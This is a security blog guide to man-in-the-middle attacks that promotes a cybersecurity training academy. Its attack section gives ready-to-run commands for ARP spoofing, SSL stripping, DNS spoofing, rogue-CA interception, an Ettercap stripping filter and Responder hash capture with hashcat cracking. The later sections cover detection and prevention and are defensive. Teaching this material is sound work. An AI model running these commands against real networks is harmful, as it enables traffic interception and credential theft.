Date: March 4, 2025
Author: Karan Patel, CEO

Network traffic rarely travels in a straight line. Between your browser and a bank's server sit routers, switches, proxies, and DNS resolvers, any one of which can be silently compromised or impersonated. A man-in-the-middle (MITM) attack exploits exactly this reality: an adversary positions themselves between two communicating parties, reads or modifies traffic in transit, and often leaves no obvious trace on either endpoint.

This guide breaks down how MITM attacks work at the protocol level, what real-world attack tooling looks like, and how defenders can detect and prevent interception before sensitive data is exposed.

What Is a Man-in-the-Middle Attack?

A man-in-the-middle attack occurs when a third party secretly intercepts, relays, and potentially alters communications between two endpoints that believe they are talking directly to each other. The attacker does not need to break encryption outright. Instead, they manipulate the trust mechanisms that establish encrypted channels in the first place.

MITM attacks can occur at multiple layers of the OSI model:

  • Layer 2 (Data Link): ARP spoofing, MAC flooding
  • Layer 3 (Network): ICMP redirect attacks, BGP hijacking
  • Layer 7 (Application): SSL stripping, HTTP injection, DNS spoofing

Understanding the layer at which an attack operates determines which detection and prevention controls apply.

Common MITM Attack Techniques

ARP Spoofing

Address Resolution Protocol (ARP) has no authentication mechanism. An attacker on a local network can broadcast fraudulent ARP replies, associating their MAC address with a legitimate IP address, typically the default gateway. All traffic intended for that gateway then flows through the attacker's machine.

# Using arpspoof from dsniff to poison a target's ARP cache
# Redirect traffic from 192.168.1.50 toward the attacker, pretending to be the gateway

arpspoof -i eth0 -t 192.168.1.50 192.168.1.1

# Run simultaneously in a second terminal to also poison the gateway
arpspoof -i eth0 -t 192.168.1.1 192.168.1.50


With both directions poisoned, the attacker enables IP forwarding so that traffic is still relayed to its real destination; the session stays alive while every packet passes through the attacker's host.

# Enable IP forwarding so intercepted traffic is still delivered
echo 1 > /proc/sys/net/ipv4/ip_forward


SSL Stripping

SSL stripping, first demonstrated by Moxie Marlinspike, downgrades HTTPS connections to plain HTTP by intercepting the initial HTTP request before the client ever negotiates TLS. The attacker maintains a legitimate HTTPS session with the server while serving unencrypted HTTP to the victim.

# bettercap SSL strip module
sudo bettercap -iface eth0

# Inside the bettercap interactive console:
set arp.spoof.targets 192.168.1.50
arp.spoof on
set http.proxy.sslstrip true
http.proxy on
net.sniff on


The victim's browser may show HTTP in the address bar, but many users do not notice the missing padlock, particularly on mobile devices.

DNS Spoofing

DNS queries are typically unencrypted and unauthenticated. An attacker who has already achieved ARP-level interception can intercept DNS queries and respond with forged records, redirecting victims to attacker-controlled servers.

# bettercap DNS spoofing
set dns.spoof.domains targetbank.com,mail.targetbank.com
set dns.spoof.address 192.168.1.99
dns.spoof on


Combined with a convincing phishing page and a valid TLS certificate issued for a lookalike domain, this technique bypasses browser warnings entirely.

HTTPS Interception with a Rogue CA

On corporate networks, this is legitimate functionality used by DLP and web filtering appliances. In adversarial hands, the same technique allows full TLS decryption. The attacker generates a self-signed root certificate and, if they have access to the endpoint (or through a phishing attack), installs it in the system trust store.

# Run mitmproxy in transparent mode (it generates its own CA on first start)
mitmproxy --mode transparent --ssl-insecure

# Or with a custom CA cert for interception (quote the argument so the shell does not expand the *)
mitmproxy --certs '*=/path/to/rogue-ca.pem' --mode transparent


mitmproxy can log all decrypted traffic, modify responses in flight, and inject JavaScript into HTML pages, making it one of the most capable tools in an MITM toolkit.

BGP Hijacking

At the internet routing level, BGP hijacking occurs when an autonomous system (AS) advertises prefixes it does not own, attracting traffic meant for another network. This has been used in high-profile incidents to redirect traffic for cryptocurrency services, banking infrastructure, and government networks. BGP hijacking is primarily a nation-state and ISP-level threat, but understanding it matters for organizations designing resilient architectures.

Real-World MITM Tooling Used by Professionals

Security professionals and red teamers use a range of tools to simulate MITM conditions during authorized engagements. If you want hands-on experience with these tools in a structured lab environment, the courses at Redfox Cybersecurity Academy walk through real network attack and defense scenarios with guided exercises.

Bettercap

Bettercap is a modular, actively maintained network attack framework that handles ARP spoofing, DNS spoofing, SSL stripping, and traffic capture in a single interactive session.

# Full MITM setup with bettercap caplet (scripted session)
# Save the following as mitm.cap

set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.1.0/24
arp.spoof on
set net.sniff.verbose true
net.sniff on
set dns.spoof.all true
set dns.spoof.address 192.168.1.99
dns.spoof on
# Run the caplet
sudo bettercap -iface eth0 -caplet mitm.cap


Ettercap

Ettercap is a classic MITM tool with plugin support for credential harvesting, filter injection, and protocol dissection.

# Ettercap text-mode ARP MITM between gateway and target
sudo ettercap -T -M arp:remote /192.168.1.1// /192.168.1.50//

# With a filter to downgrade HTTPS to HTTP in HTML responses
sudo ettercap -T -M arp:remote -F strip_https.ef /192.168.1.1// /192.168.1.50//


An Ettercap filter for content injection is compiled with etterfilter and looks like this:

# strip_https.ecf -- inject a redirect into HTTP responses
if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "https://")) {
     replace("https://", "http://");
     msg("SSL stripped in response\n");
  }
}

# Compile the filter source into the binary .ef file that Ettercap loads with -F
etterfilter strip_https.ecf -o strip_https.ef


Responder

On Windows-heavy networks, Responder poisons LLMNR, NBT-NS, and mDNS name resolution broadcasts, capturing NTLMv2 challenge-response hashes when clients attempt to authenticate to attacker-controlled shares.

# Start Responder on the interface connected to the target network
sudo responder -I eth0 -rdw

# Captured hashes appear in /usr/share/responder/logs/
# Crack with hashcat
hashcat -m 5600 captured_hashes.txt /usr/share/wordlists/rockyou.txt


Responder is not traditional MITM in the network interception sense, but it exploits the same trust gap in broadcast-based name resolution and frequently leads to full domain compromise.

How to Detect Man-in-the-Middle Attacks

Detection requires visibility at multiple layers. A single control is rarely sufficient.

ARP Cache Anomaly Detection

On individual hosts, comparing the ARP cache against known mappings reveals spoofing.

# Check the local ARP table on Linux
arp -n

# Look for duplicate MAC addresses assigned to different IPs,
# or the gateway IP mapped to an unexpected MAC
ip neigh show


A defender's script can alert when the gateway MAC changes:

#!/bin/bash
KNOWN_GW_MAC="aa:bb:cc:dd:ee:ff"
GATEWAY_IP="192.168.1.1"
# Match the gateway IP exactly: a plain grep for 192.168.1.1 would also match 192.168.1.10, .100, ...
CURRENT_MAC=$(arp -n | awk -v ip="$GATEWAY_IP" '$1 == ip {print $3}')

# Only alert when the entry is present and differs from the known MAC
# (an expired cache entry yields an empty value, not a spoof)
if [ -n "$CURRENT_MAC" ] && [ "$CURRENT_MAC" != "$KNOWN_GW_MAC" ]; then
   echo "ALERT: Gateway MAC changed to $CURRENT_MAC" | mail -s "Possible ARP Spoof" soc@company.com
fi


At the network level, tools like arpwatch maintain a persistent log of IP-to-MAC mappings and alert on changes.

sudo apt install arpwatch
sudo arpwatch -i eth0
# Logs to syslog; integrate with SIEM for alerting


TLS Certificate Inspection

When SSL stripping or rogue CA attacks are active, TLS certificates may exhibit anomalies: unexpected issuers, recently generated certificates, or mismatched subject alternative names (SANs).

# Inspect the leaf certificate a site presents (send SNI with -servername; redirect stdin so s_client exits after the handshake)
openssl s_client -connect targetsite.com:443 -servername targetsite.com -showcerts </dev/null 2>/dev/null | openssl x509 -noout -text | grep -E "Issuer|Subject|Not Before|Not After|DNS:"


Organizations should monitor certificate transparency (CT) logs for unauthorized certificates issued for their domains using tools like certspotter or the crt.sh API.

# Query crt.sh for certificates issued for a domain (-r prints raw names; multi-SAN entries are newline-separated)
curl -s "https://crt.sh/?q=%25.yourdomain.com&output=json" | jq -r '.[].name_value' | sort -u


Enroll your domain in a CT monitoring service and alert on any certificate not issued through your approved CA. This is a low-cost, high-value detection control that many organizations overlook.
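The CT monitoring loop described above, as an added example that is not part of the original post: it reads crt.sh-style JSON (the field names "id", "issuer_name", "name_value" and "not_before" are assumed to match crt.sh's output), keeps only records that actually cover the monitored domain, and reports any that were not issued by an approved CA, marking recent ones. The approved-issuer list and the three records are constructed sample data.

```python
import json
from datetime import datetime, timedelta

APPROVED_ISSUERS = ("Let's Encrypt",)   # assumption: the CAs your org actually uses
MONITORED_DOMAIN = "yourdomain.com"

# Constructed sample of crt.sh's JSON output (fields as crt.sh names them;
# none of these are real certificates).
SAMPLE_CRTSH_JSON = json.dumps([
    {"id": 1, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "yourdomain.com\nwww.yourdomain.com",
     "not_before": "2025-01-10T08:00:00"},
    {"id": 2, "issuer_name": "C=XX, O=Example Untrusted CA, CN=Example Root",
     "name_value": "mail.yourdomain.com",
     "not_before": "2025-03-01T12:30:00"},
    {"id": 3, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "yourdomain.com.evil.example",   # lookalike, not our domain
     "not_before": "2025-03-02T00:00:00"},
])


def covers_domain(name, domain):
    """True if a SAN (wildcards included) names `domain` or a subdomain of it."""
    name = name.lower().lstrip("*.")
    return name == domain or name.endswith("." + domain)


def find_unexpected_certs(raw_json, domain=MONITORED_DOMAIN,
                          approved=APPROVED_ISSUERS, now=None, recent_days=7):
    """Return (id, issuer, matching_names, recently_issued) for every crt.sh
    record that covers `domain` but was not issued by an approved CA."""
    now = datetime.fromisoformat(now) if now else datetime.now()
    findings = []
    for rec in json.loads(raw_json):
        names = [n for n in rec["name_value"].splitlines() if covers_domain(n, domain)]
        if not names:
            continue     # crt.sh substring hit on a lookalike, not our domain
        if any(ca in rec["issuer_name"] for ca in approved):
            continue
        issued = datetime.fromisoformat(rec["not_before"])
        recent = now - issued <= timedelta(days=recent_days)
        findings.append((rec["id"], rec["issuer_name"], names, recent))
    return findings


if __name__ == "__main__":
    for cert_id, issuer, names, recent in find_unexpected_certs(SAMPLE_CRTSH_JSON):
        print(("NEW " if recent else "") + f"unexpected cert #{cert_id} for {names} from {issuer}")
```

Feed the output of the crt.sh query above into find_unexpected_certs on a schedule and route any finding to the SOC; the lookalike record shows why matching must be anchored on the domain rather than on a substring.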

Network Traffic Analysis

Unusual traffic patterns can indicate active interception. Wireshark and Zeek are the primary tools for deep packet inspection in lab and enterprise environments respectively.

# Capture and filter for ARP anomalies in Wireshark via CLI tshark
tshark -i eth0 -Y "arp.duplicate-address-detected or arp.duplicate-address-frame" -w arp_anomalies.pcap


# Zeek script to detect duplicate ARP replies
# Save as detect_arp_spoof.zeek and run with: zeek -i eth0 detect_arp_spoof.zeek

# Last sender MAC seen for each sender IP (the script's own ARP cache)
global arp_cache: table[addr] of string;

event arp_reply(mac_src: string, mac_dst: string, SPA: addr, SHA: string, TPA: addr, THA: string) {
   if ( SPA in arp_cache && arp_cache[SPA] != SHA ) {
       print fmt("ARP spoof detected: %s claimed by %s, previously %s", SPA, SHA, arp_cache[SPA]);
   }
   arp_cache[SPA] = SHA;
}


Zeek integrates well with Elastic Stack and Splunk, making it a standard component of network security monitoring (NSM) architectures. Understanding how to read and write Zeek scripts is covered in depth in the network defense modules at Redfox Cybersecurity Academy.
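An added example, not code from the original post, that combines the host-level gateway MAC check from the ARP cache section with the stateful logic of the Zeek script above: it consumes (sender IP, sender MAC) pairs as they would be seen in ARP replies, alerts when an IP's MAC changes, and additionally alerts when one MAC ends up claiming the gateway plus another host, the full-duplex poisoning pattern. The gateway address and all sample replies are constructed values.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"          # assumption: the segment's default gateway


class ArpMonitor:
    def __init__(self, gateway_ip=GATEWAY_IP):
        self.gateway_ip = gateway_ip
        self.cache = {}                   # ip -> last MAC seen claiming it
        self.claims = defaultdict(set)    # mac -> set of IPs it has claimed
        self.alerts = []

    def observe(self, spa, sha):
        """Process one ARP reply (SPA = sender IP, SHA = sender MAC)."""
        sha = sha.lower()
        previous = self.cache.get(spa)
        if previous is not None and previous != sha:
            self.alerts.append(
                f"MAC change: {spa} now claimed by {sha}, previously {previous}")
        self.cache[spa] = sha
        self.claims[sha].add(spa)
        # One MAC answering for the gateway *and* another host is the classic
        # full-duplex poisoning pattern, not a legitimate hardware swap.
        if self.gateway_ip in self.claims[sha] and len(self.claims[sha]) > 1:
            others = sorted(self.claims[sha] - {self.gateway_ip})
            self.alerts.append(
                f"Gateway impersonation: {sha} claims {self.gateway_ip} and {others}")
        return self.alerts


# Constructed sample ARP replies: a clean baseline, then one MAC poisoning
# both the gateway entry and the victim entry.
SAMPLE_REPLIES = [
    ("192.168.1.1", "aa:bb:cc:dd:ee:ff"),    # real gateway
    ("192.168.1.50", "00:11:22:33:44:55"),   # victim workstation
    ("192.168.1.1", "de:ad:be:ef:00:01"),    # gateway IP claimed by a new MAC
    ("192.168.1.50", "de:ad:be:ef:00:01"),   # victim IP claimed by the same MAC
]


def run(replies=SAMPLE_REPLIES, gateway_ip=GATEWAY_IP):
    """Feed a list of (SPA, SHA) replies through the monitor; return its alerts."""
    monitor = ArpMonitor(gateway_ip)
    for spa, sha in replies:
        monitor.observe(spa, sha)
    return monitor.alerts


if __name__ == "__main__":
    for alert in run():
        print("ALERT:", alert)
```

In production the pairs would come from a packet source (a Zeek log, tshark, or a raw socket) instead of the sample list, and a legitimate gateway replacement should be whitelisted by updating the expected MAC rather than silencing the alert.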

HSTS and Certificate Pinning Failures

In browsers and mobile applications, HTTP Strict Transport Security (HSTS) preloading and certificate pinning force clients to reject unexpected certificates. Monitoring application logs for TLS handshake failures or pinning violations can surface active MITM attempts targeting mobile apps and API clients.

Prevention: Defense-in-Depth for MITM Attacks

Enforce HSTS and Preloading

Add your domain to the HSTS preload list at hstspreload.org. This instructs all major browsers to refuse HTTP connections and reject invalid certificates for your domain, regardless of what the network says.

# Nginx HSTS header with 2-year max-age and preload flag
add_header Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" always;


Deploy DNSSEC and DNS over HTTPS

DNSSEC adds cryptographic signatures to DNS records, preventing forged responses. DNS over HTTPS (DoH) encrypts DNS queries end-to-end, removing the interception surface entirely.

# Test DNSSEC validation for a domain
dig +dnssec yourdomain.com

# Check if the AD (Authenticated Data) flag is present in the response
# AD flag confirms DNSSEC validation passed


For internal resolvers, configuring DoH on endpoints prevents DNS spoofing even when the attacker has achieved Layer 2 interception.

Dynamic ARP Inspection (DAI) on Managed Switches

On Cisco and similar managed switches, DAI validates ARP packets against a DHCP snooping binding table, dropping replies that do not match known IP-to-MAC associations.

! Cisco IOS - Enable DHCP snooping and DAI on VLAN 10
ip dhcp snooping
ip dhcp snooping vlan 10

ip arp inspection vlan 10
ip arp inspection validate src-mac dst-mac ip

! Mark uplinks to trusted switches or routers as trusted
interface GigabitEthernet0/1
ip dhcp snooping trust
ip arp inspection trust


This single control eliminates most LAN-based ARP spoofing at the hardware level and should be standard on any managed network.

Mutual TLS (mTLS) for Service-to-Service Communication

In microservices architectures, mTLS ensures both the client and the server present certificates signed by a trusted CA. An attacker who intercepts the connection cannot forge either side without access to both private keys.

# Example: Istio service mesh mTLS policy (Kubernetes)
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
 name: default
 namespace: production
spec:
 mtls:
   mode: STRICT


Network Segmentation and Zero Trust Architecture

Flat networks are a prerequisite for lateral MITM attacks. Segmenting networks by function (workstations, servers, IoT, guest) using VLANs and firewall rules limits the blast radius of any single compromised host.

Zero trust architecture removes implicit trust based on network location entirely. Every request is authenticated, authorized, and encrypted regardless of whether it originates inside or outside the perimeter. For organizations building zero trust implementations, the practical labs at Redfox Cybersecurity Academy cover network segmentation, identity-aware proxies, and microsegmentation strategies using real enterprise tooling.

VPN and Encrypted Tunnels for Remote Access

On untrusted networks, all traffic should traverse an encrypted tunnel. WireGuard has largely replaced older IPSec and OpenVPN deployments for its simplicity, performance, and modern cryptography.

# WireGuard interface configuration on a client
[Interface]
PrivateKey = <client_private_key>
Address = 10.0.0.2/32
DNS = 10.0.0.1

[Peer]
PublicKey = <server_public_key>
AllowedIPs = 0.0.0.0/0
Endpoint = vpn.company.com:51820
PersistentKeepalive = 25


With AllowedIPs = 0.0.0.0/0, all traffic is routed through the VPN, preventing local network interception regardless of the attacker's position on the LAN.

Key Takeaways

Man-in-the-middle attacks are not a single technique but a broad class of interception methods that span every layer of the network stack. The common thread is trust exploitation: ARP has no authentication, DNS historically had no verification, and TLS trust relies on a certificate authority ecosystem that can be subverted.

Effective defense combines protocol hardening (HSTS preloading, DNSSEC, mTLS), network-level controls (DAI, DHCP snooping, VLAN segmentation), and continuous monitoring (arpwatch, CT log monitoring, Zeek-based NSM). No single control is sufficient on its own.

For practitioners who want to go beyond theory and work through these attacks and defenses in a structured lab environment, the courses at Redfox Cybersecurity Academy cover network penetration testing, traffic analysis, and enterprise defense architecture with hands-on scenarios built around real-world tooling.
